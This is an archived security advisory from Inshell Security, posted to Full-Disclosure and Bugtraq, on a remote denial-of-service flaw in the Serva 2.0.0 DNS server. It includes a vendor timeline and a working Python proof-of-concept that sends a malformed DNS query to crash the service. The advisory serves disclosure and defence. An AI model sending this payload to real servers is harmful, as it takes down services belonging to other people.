| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Mon, 14 Jan 2013 22:15:37 +0100 From: Inshell Security <info@...hell.net> To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com, vuln@...unia.com, submissions@...ketstormsecurity.org, moderators@...db.org Subject: [IA33] Serva v2.0.0 DNS Server Remote Denial of Service Inshell Security Advisory http://www.inshell.net 1. ADVISORY INFORMATION ----------------------- Product: Serva Vendor URL: www.vercot.com Type: Uncaught Exception [CWE-248] Date found: 2012-07-08 Date published: 2013-01-14 CVSSv2 Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P) CVE: - 2. CREDITS ---------- This vulnerability was discovered and researched by Julien Ahrens from Inshell Security. 3. VERSIONS AFFECTED -------------------- Serva 2.0.0, older versions may be affected too. 4. VULNERABILITY DESCRIPTION ---------------------------- Serva v2.0.0 suffers from a Remote Denial of Service Vulnerability in the DNS module. The Query Name consists of multiple byte fields which contain the length of the subsequent part of the name query. The application does not properly validate the first length-field, which could lead to a stack corruption resulting in a remote denial of service condition. An attacker needs to send a DNS request with a manipulated length-byte with a size greater than "\x7F" in the Query Name field to crash the application. Since parts of the Tftpd32 v4.0 release are used in Serva, this bug was ported from the Tftpd32 v4.0 release too (http://www.securityfocus.com/archive/1/522877). 5. PROOF-OF-CONCEPT (Code / Exploit) ------------------------------------ #!/usr/bin/python import socket target="192.168.0.1" port=53 TransACTID="\x03\xc3" Flags="\x01\x00" QuestionRRC="\x00\x01" AnswerRRC="\x00\x00" AuthRRC="\x00\x00" AddRRC="\x00\x00" QueryName="\xFF\x69\x6e\x73\x68\x65\x6c\x6c\x03\x6e\x65\x74\x00" QueryType="\x00\x01" QueryClass="\x00\x01" payload = TransACTID + Flags + QuestionRRC + AnswerRRC + AuthRRC + AddRRC + QueryName + QueryType + QueryClass print "[*] Connecting to Target " + target + "..." s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0) print "[*] Sending malformed request..." s.sendto(payload,(target,port)) print "[!] Exploit has been sent!\n" s.close() For further Screenshots and/or PoCs visit: http://security.inshell.net/advisory/33 6. SOLUTION ----------- None 7. REPORT TIMELINE ------------------ 2012-07-08: Initial notification sent to vendor 2012-07-18: Vendor provides bugfix - release to verify that the vulnerability has been properly fixed 2012-07-22: Inshell confirms that the bug has been fixed 2012-08-29: Inshell asks vendor about the ETA of the planned release 2012-08-29: Vendor states that the release takes a bit longer than expected 2012-10-04: Inshell asks about ETA of the new release 2012-10-04: Vendor states that there will be another delay, because other features need to be added 2012-11-17: Inshell asks about hotfix solution 2012-11-18: Vendor states that there is no time for releasing a hotfix 2013-01-13: Full Disclosure 8. REFERENCES ------------- http://security.inshell.net/advisory/33 http://www.securityfocus.com/archive/1/522877
Powered by blists - more mailing lists